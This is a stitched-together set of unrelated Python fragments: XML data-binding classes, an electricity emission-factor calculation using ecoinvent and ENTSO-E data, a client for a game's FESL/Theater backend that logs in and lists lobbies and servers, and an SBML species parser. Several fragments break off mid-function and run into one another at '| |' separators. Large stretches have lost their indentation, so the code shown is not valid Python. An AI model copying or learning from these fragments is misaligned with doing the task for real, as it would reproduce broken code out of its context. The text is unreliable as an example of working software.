        if ArrayOfDocumentCriteria.subclass:
            return ArrayOfDocumentCriteria.subclass(*args_, **kwargs_)
        else:
            return ArrayOfDocumentCriteria(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_DocumentCriteria(self):
        return self.DocumentCriteria
    def set_DocumentCriteria(self, DocumentCriteria):
        self.DocumentCriteria = DocumentCriteria
    def add_DocumentCriteria(self, value):
        self.DocumentCriteria.append(value)
    def insert_DocumentCriteria_at(self, index, value):
        self.DocumentCriteria.insert(index, value)
    def replace_DocumentCriteria_at(self, index, value):
        self.DocumentCriteria[index] = value
    def hasContent_(self):
        # True when at least one DocumentCriteria child is present.
        if (
            self.DocumentCriteria
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfDocumentCriteria', pretty_print=True):
        """Serialize this element and its children to *outfile* as XML."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfDocumentCriteria')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was originally parsed from
        if self.original_tagname_ is not None and name_ == 'ArrayOfDocumentCriteria':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfDocumentCriteria')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfDocumentCriteria', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfDocumentCriteria'):
        # No attributes are declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfDocumentCriteria', fromsubclass_=False, pretty_print=True):
        # eol_ is computed for symmetry with other generated exporters,
        # though child elements handle their own line endings here.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for DocumentCriteria_ in self.DocumentCriteria:
            namespaceprefix_ = self.DocumentCriteria_nsprefix_ + ':' if (UseCapturedNS_ and self.DocumentCriteria_nsprefix_) else ''
            DocumentCriteria_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='DocumentCriteria', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to parse for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Each DocumentCriteria child is built recursively and appended.
        if nodeName_ == 'DocumentCriteria':
            obj_ = DocumentCriteria.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.DocumentCriteria.append(obj_)
            obj_.original_tagname_ = 'DocumentCriteria'
# end class ArrayOfDocumentCriteria
class DocumentCriteria(GeneratedsSuper):
"""DocumentCriteria"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, PIN=None, DocumentTypes=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.PIN = PIN
self.PIN_nsprefix_ = None
self.DocumentTypes = DocumentTypes
self.DocumentTypes_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, DocumentCriteria)
if subclass is not None:
return subclass(*args_, **kwargs_)
if DocumentCriteria.subclass:
return DocumentCriteria.subclass(*args_, **kwargs_)
else:
return DocumentCriteria(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_PIN(self):
return self.PIN
def set_PIN(self, PIN):
self.PIN = PIN
def get_DocumentTypes(self):
return self.DocumentTypes
def set_DocumentTypes(self, DocumentTypes):
self.DocumentTypes = DocumentTypes
def hasContent_(self):
if (
self.PIN is not None or
self.DocumentTypes is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='DocumentCriteria', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('DocumentCriteria')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'DocumentCriteria':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='DocumentCriteria')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='DocumentCriteria', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='DocumentCriteria'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='DocumentCriteria', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.PIN is not None:
namespaceprefix_ = self.PIN_nsprefix_ + ':' if (UseCapturedNS_ and self.PIN_nsprefix_) else ''
self.PIN.export(outfile, level, namespaceprefix_, namespacedef_='', name_='PIN', pretty_print=pretty_print)
if self.DocumentTypes is not None:
namespaceprefix_ = self.DocumentTypes_nsprefix_ + ':' if (UseCapturedNS_ and self.DocumentTypes_nsprefix_) else ''
self.DocumentTypes.export(outfile, level, namespaceprefix_, namespacedef_='', name_='DocumentTypes', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed | |
# <gh_stars>0  (dataset artifact; commented out so the file stays importable)
# The original code requires pylcaio release v1.0, from Agez, found at:
# https://github.com/MaximeAgez/pylcaio
import pandas as pd
import numpy as np
import os, sys
import pickle
import logging
import pylcaio
fp_results = os.path.join(os.path.curdir, 'results')
fp_output = os.path.join(os.path.curdir, 'output')
def hybrid_emission_factors(trade_only, year):
Analysis = pylcaio.Analysis('ecoinvent3.5','exiobase3', method_double_counting='STAM')
# For making human-readable indices; consists of all ecoinvent process metadata
labels = Analysis.PRO_f
# Make DataFrame for whole ecoinvent requirements matrix with human-readable indices
Aff_labels = (labels.join(Analysis.A_ff,how='inner'))
Aff_labels = (Aff_labels).set_index(keys=['activityName', 'geography', 'productName'], append=True)
Aff_labels = Aff_labels.iloc[:,19:] # remove extraeneous metadata
Aff_labels.columns = Aff_labels.index
# Calculate life cycle impacts
I = pd.DataFrame(np.eye(len(Analysis.A_ff)), Analysis.A_ff.index, Analysis.A_ff.columns)
X = pd.DataFrame(np.linalg.solve(I-Analysis.A_ff, I), Analysis.A_ff.index, I.columns) # pro x pro
D = Analysis.C_f.fillna(0).dot(Analysis.F_f).dot(X) # pro x imp
D = D.T
D_labels = labels.join(D, how='inner')
D_labels.set_index(keys=['activityName', 'geography', 'productName'], append=True, inplace=True)
D_labels = D_labels.iloc[:, 19:]
D_labels = D_labels.T
# Other possible impact methods
imp_list = ['EDIP; environmental impact; global warming, GWP 100a; kg CO2-Eq', 'ReCiPe Midpoint (H); climate change; GWP100; kg CO2-Eq', 'ReCiPe Midpoint (H) V1.13; climate change; GWP100; kg CO2-Eq', 'IPCC 2013; climate change; GTP 100a; kg CO2-Eq']
D_labels_comp = D_labels.loc[imp_list]
D_labels = D_labels.loc['EDIP; environmental impact; global warming, GWP 100a; kg CO2-Eq']
# the footprint of all hybridized processes from ecoinvent, with their original footprint
fp_hybrid = os.path.join(os.path.curdir, 'data', 'Results_full_database_STAM_2011.xlsx')
hybrid_results = pd.read_excel(fp_hybrid, 'GWP_only_hyb', usecols='A:E,G', index_col=[0,1,2,3,4])
# ## List of ENTSO-E countries
country_list = ['AL','AT','BA','BE','BG','CH','CZ','DE','DK','EE',
'ES','FI','FR','GR','HR','HU','IE','IT','LT','LU',
'LV','ME','MK','NL','NO','PL','PT','RO','RS','SE',
'SI','SK','GB','TR','GE','CY','HR','NI','UK']
# Find all electricity processes
set(labels.loc[labels['activityName'].str.contains('electricity')]['activityName'])
# Isolate high voltage (production) mixes and low voltage mixes (which includes solar PV)
# note that pumped storage hydropower in CH gets excluded as it has 0 contribution to the production mix (for whatever reason)
market_mixes = labels.loc[labels['activityName'].str.contains('electricity, high voltage, production mix')] # production mixes, do not include solar or waste (or Swiss pumped hydro)
waste_mixes = labels.loc[labels['activityName'].str.contains('electricity, from municipal waste incineration to generic market for electricity, medium voltage')] # production mixes, do not include solar
solar_mixes = labels.loc[labels['activityName'].str.contains('electricity, low voltage')] # use low voltage mixes to get shares of solar photovoltaic
# ### Filter for high-voltage production mixes
# First, retrieve electricity mixes, and reduce un-needed processes
df = Aff_labels[market_mixes.index]
df_waste = Aff_labels.loc[waste_mixes.index]
df_solar = Aff_labels[solar_mixes.index]
df = df.loc[:, df.columns.isin(country_list, level=2)]
# manual workaround for keeping CH pumped hydro after removing unneeded rows
# (since this ecoinvent process apparently does not contribute to any electricity mixes in ecoinvent)
ind =('69ccf019-081e-42e3-b7f5-879dc7dde86a_66c93e71-f32b-4591-901c-55395db5c132', 'electricity production, hydro, pumped storage', 'CH', 'electricity, high voltage') # Activityid for Swiss pumped hydro
col = df.columns.get_loc(('54ed269b-e329-469c-902e-a8991ee7d24a_66c93e71-f32b-4591-901c-55395db5c132', 'electricity, high voltage, production mix', 'CH', 'electricity, high voltage'))
index = df.index.get_loc(ind)
df.iloc[index, col] = 1e-7
df = df.replace(0, np.nan).dropna(how='all', axis=0)
# ### Filter for medium-voltage mixes ( to find waste incineration shares)
df_waste = df_waste.loc[:, df_waste.columns.isin(country_list, level=2)]
df_waste = df_waste.replace(to_replace=0, value=np.nan).dropna(how='all', axis=0)
# check unique waste incineration activities
set(df_waste.index.get_level_values('activityName'))
# ### Filter for low-voltage mixes (to find solar photovoltaic shares)
df_solar = df_solar.loc[:, df_solar.columns.isin(country_list, level=2)]
df_solar = df_solar.replace(to_replace=0, value=np.nan).dropna(how='all', axis=0)
# ### Develop correspondence between ecoinvent and ENTSO-E technology categories
# Correspondence from ENTSO-E technology categories to keywords for searching in ecoinvent processes
# Note that the 'fossil oil shale', 'other' and 'other renewable' do not have ecoinvent equivalents;
# these are dealt with later
tec_dict = {'Biomass': ['biogas', 'wood chips'],
'Fossil Brown coal/Lignite': 'lignite',
'Fossil Coal-derived gas': 'coal gas',
'Fossil Gas': 'natural gas',
'Fossil Hard coal': 'hard coal',
'Fossil Oil': ' oil',
'Fossil Oil shale': '--',
'Fossil Peat': 'peat',
'Geothermal': 'geothermal',
'Hydro Pumped Storage': 'pumped storage',
'Hydro Run-of-river and poundage': 'run-of-river',
'Hydro Water Reservoir': 'reservoir',
'Nuclear': 'nuclear',
'Other': '---',
'Other renewable': '----',
'Solar': ['solar thermal', 'solar tower', 'photovoltaic'],
'Waste': 'waste incineration',
'Wind Offshore': 'offshore',
'Wind Onshore': 'onshore'
}
# reverse correspondence from ecoinvent search keywords to ENTSO-E categories
temp_tecdict = { 'biogas':'Biomass',
'wood chips':'Biomass',
'lignite': 'Fossil Brown coal/Lignite' ,
'coal gas': 'Fossil Coal-derived gas',
'natural gas': 'Fossil Gas' ,
'hard coal': 'Fossil Hard coal' ,
' oil': 'Fossil Oil',
'--' : 'Fossil Oil shale',
'peat': 'Fossil Peat' ,
'geothermal':'Geothermal',
'pumped storage': 'Hydro Pumped Storage',
'run-of-river': 'Hydro Run-of-river and poundage',
'reservoir': 'Hydro Water Reservoir',
'nuclear' : 'Nuclear',
'---':'Other' ,
'----': 'Other renewable',
'solar thermal': 'Solar',
'solar tower': 'Solar',
'photovoltaic': 'Solar',
'waste incineration': 'Waste', # 'electricity, from municipal waste incineration to generic market for electricity, medium voltage',
'offshore': 'Wind Offshore',
'onshore':'Wind Onshore'
}
# flatten tec list
tec_list = list(tec_dict.values())
for item in tec_list:
if type(item)==list:
for subitem in item:
tec_list.append(subitem)
tec_list.remove(item)
# Get list of solar PV processes in ecoinvent
d = list(set(df_solar.index.get_level_values(level=1)))
pv = [entry for entry in d if 'electricity production' in entry] # all low-voltage production technologies
# Fetch waste incineration process names
waste = ['electricity, from municipal waste incineration to generic market for electricity, medium voltage']
# Make list of electricity generation technologies (both high voltage and low-voltage, i.e., solar PV)
ecoinvent_tecs = list(set(df.index.get_level_values(level=1))) + pv + waste
# Quality assurance; make sure all ecoinvent technologies are covered by the keyword search, and keyword matches are correct
# also, check number of matches for each keyword
matches = []
match_keys = []
num_matches = dict((keyword,0) for keyword in tec_list)
for tec in ecoinvent_tecs:
for keyword in tec_list:
if keyword in tec and tec not in matches:
# print(f'{keyword} is in {tec}')
matches.append(tec)
match_keys.append(temp_tecdict[keyword])
num_matches[keyword] += 1
print(num_matches)
# Find ecoinvent tecs that were not matched
if len(ecoinvent_tecs)-len(matches) > 0:
print('ecoinvent process(es) not matched:')
print(set(ecoinvent_tecs).difference(set(matches)))
# Correspondence of ENTSO-E categories and specific ecoinvent processes
from collections import defaultdict
ei_tec_dict = defaultdict(list) # keys as entso-e categories, values are corresponding ei
rev_ei_tec_dict = defaultdict(list) # vice-versa; keys as ei, values are entso-e categories
for i, j in zip(match_keys, matches):
ei_tec_dict[i].append(j)
rev_ei_tec_dict[j].append(i)
# Build correspondence table for Supplementary Information
tec_index = pd.Index(list(ei_tec_dict.keys()))
tec_values = list(ei_tec_dict.values())
ei_tec_table = pd.DataFrame(tec_values, index=tec_index).stack()
ei_tec_table.index = ei_tec_table.index.droplevel(level=1)
ei_tec_table.sort_index(axis=0, inplace=True)
# ### Calculate shares of ecoinvent processes
# For multi-process technology categories, e.g., solar, biomass...
# combine high-, medium- and low-voltage electricity mixes for full tech resolution
f = pd.concat([df, df_waste, df_solar], axis=1)
rev_ei_tec_dict = {k: v for k, v in rev_ei_tec_dict.items() if not not v}
temp_list = f.index.get_level_values('activityName')
entso_list = []
f_check = []
# For every activity in ecoinvent,if they are related to electricity production, add to entso_list
# If not, drop from the matrix; they are irrelevant
for entry in temp_list:
try:
entso_list.append(rev_ei_tec_dict[entry])
except:
f_check.append(entry)
f.drop(index=set(f_check), level=1, axis=0, inplace=True)
# inputs to electricity mixes not included in the calculations of emission factors
set(f_check)
entso_list = [item for sublist in entso_list for item in sublist] #flatten list
entso_index = pd.Index(tuple(entso_list), name='entso_e')
f.set_index(entso_index, append=True, inplace=True)
# ### Get shares of each ecoinvent process for each ENTSO-E technology category
f_gpby = f.groupby(level='entso_e')
# Get shares of each ecoinvent process in each ENTSO-E technology category;
# for calculating weighted average for emission factor
ei_process_shares = f.divide(f_gpby.sum(), level=4, axis=1)
hybrid_temp = hybrid_results.reset_index(level=[1,2,3,4], drop=True)
g_temp = ei_process_shares.reset_index(level=[1,2,3,4], drop=True)
# ### Calculate weighted average, hybridized emissions factor for each technology
ef = ei_process_shares.mul(hybrid_temp.iloc[:, 0], axis=0, level=0)
ef_aggregated = ef.groupby(level='entso_e').sum()
ef_countries = ef_aggregated.sum(axis=1, level='geography')
ef_countries.replace(0, np.nan, inplace=True)
ef_countries.dropna(axis=1, how='all', inplace=True)
ef_countries.sort_index(inplace=True)
ef_countries = ef_countries.T
ef_countries.sort_index(axis=0, inplace=True)
entso_fp = os.path.join(fp_output, 'entsoe', 'ENTSO_production_volumes_' + str(year) + '.csv')
entso_e_production = pd.read_csv(entso_fp, header=0, index_col=[0])
entso_e_production.replace(0, np.nan,inplace=True)
entso_mask = entso_e_production.isna().sort_index()
ef_mask = ef_countries.sort_index().isna()
entso_mask.drop(columns=['Fossil Oil shale', 'Other', 'Other renewable', 'Marine'], inplace=True)
entso_mask.index.rename('geography', inplace=True)
entso_mask.columns.rename('entso_e', inplace=True)
# Countries for which we have production data, but no hybridized emission factors
no_ef_countries = set(entso_e_production.index) - set(ef_countries.index)
print('Countries with production data, but no hybridized emission factors:')
print(no_ef_countries)
logging.warning(f'{no_ef_countries} have production data from ENTSO_E but no hybridized emission factors')
list(set(ef_countries.columns) - set(entso_e_production.index))
check_df = entso_mask.eq(ef_mask, axis=0)
# Find countries missing from ecoinvent
missing_countries = []
for country, row in check_df.iterrows():
if not row.any():
missing_countries.append(country)
# Optionally, drop them from mask
check_df.drop(index = missing_countries, inplace=True)
# Find the technology-country pairs that are missing hybridized emission factors
countries_missing_ef = {}
for tec, col in check_df.iteritems():
temp = check_df.index[check_df[tec] == False].tolist()
print(f'For {tec}, regionalized, hybridized emission factors are missing for | |
available_packet_length):
query_chunk = stats_query_enc[i:i + available_packet_length]
chunk_packet = FeslPacket.build(
b'rank\xf0\x00\x00\x00',
b'size=' + encoded_query_size.encode('utf8') + b'\ndata=' + query_chunk,
tid
)
chunk_packets.append(chunk_packet)
return chunk_packets
    @staticmethod
    def is_valid_login_response(response: Packet) -> Tuple[bool, str]:
        """Check whether a FESL login response indicates success.

        A successful login response contains an ``lkey=`` key/value pair.
        On failure, the server's localized error message is extracted
        (empty string when no such line is present).
        """
        valid = b'lkey=' in response.body
        if not valid:
            lines = response.get_data_lines()
            # b'localizedMessage=' is 17 bytes; slicing [18:-1] drops the
            # prefix plus one extra leading char and the final char --
            # presumably stripping the quotes around the message value
            # (NOTE(review): confirm values are always quoted)
            message = next((line[18:-1] for line in lines if line.startswith(b'localizedMessage=')), b'').decode('utf8')
        else:
            message = ''
        return valid, message
    @staticmethod
    def parse_list_response(raw_response: bytes, list_entry_prefix: bytes) -> Tuple[List[dict], List[bytes]]:
        """Parse a FESL list response body into entry dicts plus meta lines.

        :param raw_response: Re-assembled response payload (newline-separated
                             key=value lines)
        :param list_entry_prefix: Prefix marking list entries, e.g. b'userInfo.'
        :return: Tuple of (list of entry dicts, remaining meta data lines)
        """
        lines = raw_response.split(b'\n')
        # Assign lines to either data or meta lines
        meta_lines = []
        data_lines = []
        for line in lines:
            if line.startswith(list_entry_prefix) and list_entry_prefix + b'[]' not in line:
                # Append data line (without entry prefix)
                # So for userInfo.0.userId=226804555, only add 0.userId=226804555 (assuming prefix is userInfo.)
                data_lines.append(line[len(list_entry_prefix):])
            else:
                # Add meta data lines as is (includes the length indicator line)
                meta_lines.append(line)
        # Determine data entry count from the '.[]=' length indicator line
        length_info = next(line for line in meta_lines if b'.[]' in line)
        entry_count = int(length_info.split(b'=').pop())
        # Init dict list, one dict per entry
        datasets = [{} for _ in range(0, entry_count)]
        # Sort reverse to get sub-list length indicators first, so sub-lists
        # exist before their element lines are processed
        # (99.addStats.[]=10 will be sorted before 99.addStats.9.value=777.678)
        for line in sorted(data_lines, reverse=True):
            # Split into keys and data and split into index and key
            # line format will something like: 0.userId=22680455
            elements = line.split(b'=')
            key_elements = elements[0].split(b'.')
            index = int(key_elements[0])
            key = key_elements[1].decode()
            value = elements[1].decode()
            # Add sub-list (99.addStats.9.value=777.678) or simple scalar value (99.value=8.367105024E9)
            if len(key_elements) >= 3 and b'.[]=' in line:
                # If line contains a sub-list length indicator, init sub list of given length
                datasets[index][key] = [{} for _ in range(0, int(value))]
            elif len(key_elements) >= 4:
                # Line contains sub-list data => append to list at index and key
                sub_index = int(key_elements[2])
                sub_key = key_elements[3].decode()
                datasets[index][key][sub_index][sub_key] = value
            else:
                # Add scalar value to dict
                datasets[index][key] = value
        return datasets, meta_lines
    @staticmethod
    def handle_list_response_packet(packet: Packet, list_entry_prefix: bytes) -> Tuple[bytes, bool]:
        """Validate one list-response packet and extract its payload.

        Multi-packet responses carry base64-encoded chunks in ``data=``
        lines; single-packet responses contain the list directly.

        :param packet: Response packet to process
        :param list_entry_prefix: Expected list entry prefix (used to detect
                                  single-packet responses)
        :return: Tuple of (payload bytes, whether this was the last packet)
        :raises ParameterError, PlayerNotFoundError, SearchError, Error:
                mapped from FESL error codes in the response
        """
        body = packet.get_data()
        lines = packet.get_data_lines()
        # Check for errors and map known error codes to specific exceptions
        if b'errorCode' in body:
            method_line = next((line for line in lines if line.startswith(b'TXN')), b'')
            method = method_line.split(b'=').pop()
            error_code_line = next((line for line in lines if line.startswith(b'errorCode=')), b'')
            error_code = error_code_line.split(b'=').pop()
            if error_code == b'21':
                raise ParameterError('FESL returned invalid parameter error')
            elif error_code == b'101' and method == b'NuLookupUserInfo':
                raise PlayerNotFoundError('FESL returned player not found error')
            elif error_code == b'104' and method == b'NuSearchOwners':
                # Error code is returned if a) no results matched the query or b) too many results matched the query
                raise SearchError('FESL found no or too many results matching the search query')
            else:
                raise Error(f'FESL returned an error (code {error_code.decode("utf")})')
        elif b'data=' not in body and list_entry_prefix + b'[]' not in body:
            # Packet is neither one data packet of a multi-packet response nor a single-packet response
            raise Error('FESL returned invalid response')
        if b'data=' in body:
            # Packet is one of multiple => base64 decode content
            data_line = next(line for line in lines if line.startswith(b'data='))
            # URL decode/unquote and base64 decode data
            data = b64decode(unquote_to_bytes(data_line[5:]))
            # A trailing NUL byte marks the final chunk of the response
            last_packet = data[-1:] == b'\x00'
            # Remove "eof" indicator from last packet's data
            if last_packet:
                data = data[:-1]
        else:
            # Single packet response => return body as is
            data = body
            last_packet = True
        return data, last_packet
@staticmethod
def format_search_response(parsed_response: List[dict], metadata: List[bytes]) -> dict:
namespace_line = next(line for line in metadata if line.startswith(b'nameSpaceId'))
namespace = namespace_line.split(b'=').pop()
return {
'namespace': namespace.decode('utf8'),
'users': parsed_response
}
class TheaterClient(Client):
lkey: bytes
completed_steps: Dict[TheaterStep, Packet]
def __init__(self, host: str, port: int, lkey: str, platform: Platform, timeout: float = 3.0,
track_steps: bool = True):
connection = Connection(host, port, TheaterPacket)
super().__init__(connection, platform, timeout, track_steps)
self.lkey = lkey.encode('utf8')
def connect(self) -> bytes:
"""
Initialize the connection to the Theater backend by sending the initial CONN/hello packet
:return: Response packet data
"""
if self.track_steps and TheaterStep.conn in self.completed_steps:
return bytes(self.completed_steps[TheaterStep.conn])
tid = self.get_transaction_id()
connect_packet = self.build_conn_paket(tid, BACKEND_DETAILS[self.platform]['clientString'])
self.connection.write(connect_packet)
response = self.connection.read()
self.completed_steps[TheaterStep.conn] = response
return bytes(response)
def authenticate(self) -> bytes:
"""
Authenticate against/log into the Theater backend using the lkey retrieved via FESL
:return: Response packet data
"""
if self.track_steps and TheaterStep.user in self.completed_steps:
return bytes(self.completed_steps[TheaterStep.user])
elif self.track_steps and TheaterStep.conn not in self.completed_steps:
self.connect()
tid = self.get_transaction_id()
auth_packet = self.build_user_packet(tid, self.lkey)
self.connection.write(auth_packet)
response = self.connection.read()
if not self.is_valid_authentication_response(response):
raise AuthError('Theater authentication failed')
self.completed_steps[TheaterStep.user] = response
return bytes(response)
def ping(self) -> None:
ping_packet = self.build_ping_packet()
self.connection.write(ping_packet)
def get_lobbies(self) -> List[dict]:
"""
Retrieve all available game (server) lobbies
:return: List of lobby details
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
lobby_list_packet = self.build_llst_packet(tid)
self.connection.write(lobby_list_packet)
# Theater responds with an initial LLST packet, indicating the number of lobbies,
# followed by n LDAT packets with the lobby details
llst_response = self.wrapped_read(tid)
llst = self.parse_simple_response(llst_response)
num_lobbies = int(llst['NUM-LOBBIES'])
# Retrieve given number of lobbies (usually just one these days)
lobbies = []
for i in range(num_lobbies):
ldat_response = self.wrapped_read(tid)
ldat = self.parse_simple_response(ldat_response)
lobbies.append(ldat)
return lobbies
def get_servers(self, lobby_id: int) -> List[dict]:
"""
Retrieve all available game servers from the given lobby
:param lobby_id: Id of the game server lobby
:return: List of server details
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
server_list_packet = self.build_glst_packet(tid, str(lobby_id).encode('utf8'))
self.connection.write(server_list_packet)
# Again, same procedure: Theater first responds with a GLST packet which indicates the number of games/servers
# in the lobby. It then sends one GDAT packet per game/server
glst_response = self.wrapped_read(tid)
# Response may indicate an error if given lobby id does not exist
is_error, error = self.is_error_response(glst_response)
if is_error:
raise error
glst = self.parse_simple_response(glst_response)
num_games = int(glst['LOBBY-NUM-GAMES'])
# Retrieve GDAT for all servers
servers = []
for i in range(num_games):
gdat_response = self.wrapped_read(tid)
gdat = self.parse_simple_response(gdat_response)
servers.append(gdat)
return servers
def get_server_details(self, lobby_id: int, game_id: int) -> Tuple[dict, dict, List[dict]]:
"""
Retrieve full details and player list for a given server
:param lobby_id: If of the game server lobby the server is hosted in
:param game_id: Game (server) id
:return: Tuple of (general server details, extended details, player list)
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
server_details_packet = self.build_gdat_packet(tid, str(lobby_id).encode('utf8'), str(game_id).encode('utf8'))
self.connection.write(server_details_packet)
# Similar structure to before, but with one difference: Theater returns a GDAT packet (general game data),
# followed by a GDET packet (extended server data). Finally, it sends a PDAT packet for every player
gdat_response = self.wrapped_read(tid)
# Response may indicate an error if given lobby id and /or game id do not exist
is_error, error = self.is_error_response(gdat_response)
if is_error:
raise error
gdat = self.parse_simple_response(gdat_response)
gdet_response = self.wrapped_read(tid)
gdet = self.parse_simple_response(gdet_response)
# Determine number of active players (AP)
num_players = int(gdat['AP'])
# Read PDAT packets for all players
players = []
for i in range(num_players):
pdat_response = self.wrapped_read(tid)
pdat = self.parse_simple_response(pdat_response)
players.append(pdat)
return gdat, gdet, players
def is_auto_respond_packet(self, packet: Packet) -> Tuple[bool, Optional[Callable]]:
is_auto_respond_packet, handler = False, None
# Check if packet is a ping prompt
if packet.header.startswith(b'PING'):
is_auto_respond_packet = True
handler = self.ping
return is_auto_respond_packet, handler
@staticmethod
def build_conn_paket(tid: int, client_string: bytes) -> TheaterPacket:
"""
Build the initial hello/connection packet
:param tid: Transaction id (usually 1, must be sent as first packet)
:param client_string: Game client string (e.g. "bfbc2-pc")
:return: Complete packet to establish connection
"""
return TheaterPacket.build(
b'CONN@\x00\x00\x00',
b'PROT=2\nPROD=' + client_string + b'\nVERS=1.1\nPLAT=PC\nLOCALE=en_US\nSDKVERSION=5.0.0.0.0',
tid
)
@staticmethod
def build_user_packet(tid: int, lkey: bytes) -> TheaterPacket:
    """
    Build the user/login packet.
    :param tid: Transaction id (usually 2, must be sent as second packet)
    :param lkey: Login key from a FESL session
    :return: Complete packet to perform login
    """
    header = b'USER@\x00\x00\x00'
    body = b'MAC=$000000000000\nSKU=125170\nLKEY=' + lkey + b'\nNAME='
    return TheaterPacket.build(header, body, tid)
@staticmethod
def build_ping_packet() -> TheaterPacket:
    """
    Build a ping response packet.
    :return: Complete packet to respond to ping with
    """
    # Ping responses always carry transaction id 0 in the body
    header = b'PING\x00\x00\x00\x00'
    body = b'TID=0'
    return TheaterPacket.build(header, body)
@staticmethod
def build_llst_packet(tid: int) -> TheaterPacket:
    """
    Build the llst/lobby list packet.
    :param tid: Transaction id
    :return: Complete packet to list all available game lobbies
    """
    header = b'LLST@\x00\x00\x00'
    # Every filter disabled so the full lobby list comes back
    filters = (
        b'FILTER-FAV-ONLY=0\nFILTER-NOT-FULL=0\nFILTER-NOT-PRIVATE=0\nFILTER-NOT-CLOSED=0\nFILTER-MIN-SIZE=0\n'
        b'FAV-PLAYER=\nFAV-GAME=\nFAV-PLAYER-UID=\nFAV-GAME-UID='
    )
    return TheaterPacket.build(header, filters, tid)
@staticmethod
def build_glst_packet(tid: int, lid: bytes) -> | |
enzyme
Returns:
:obj:`tuple`:
* :obj:`Compound`: or :obj:`Enzyme`: compound or enzyme
* :obj:`dict`: additional properties of the compound/enzyme
* `is_wildtype` (:obj:`bool`): indicates if the enzyme is wildtype or mutant
* `variant` (:obj:`str`): description of the variant of the eznyme
* `modifier_type` (:obj:`str`): type of the enzyme (e.g. Modifier-Catalyst)
Raises:
:obj:`ValueError`: if a species is of an unsupported type (i.e. not a compound or enzyme)
"""
# id, name
type_id_compartment = sbml.getId().split('_')
type = type_id_compartment[0]
id = int(float(type_id_compartment[1]))
# modifier type
modifier_type = ''
if sbml.isSetAnnotation() \
and sbml.getAnnotation().hasChild('sabiork') \
and sbml.getAnnotation().getChild('sabiork').hasChild('modifierType'):
modifier_type = sbml \
.getAnnotation() \
.getChild('sabiork') \
.getChild('modifierType') \
.getChild(0) \
.getCharacters()
# create object or return existing object
if type == 'SPC':
name = sbml.getName()
properties = {'modifier_type': modifier_type}
query = self.session.query(Compound).filter_by(id=id)
if query.count():
specie = query.first()
else:
specie = Compound()
self.session.add(specie)
elif type == 'ENZ':
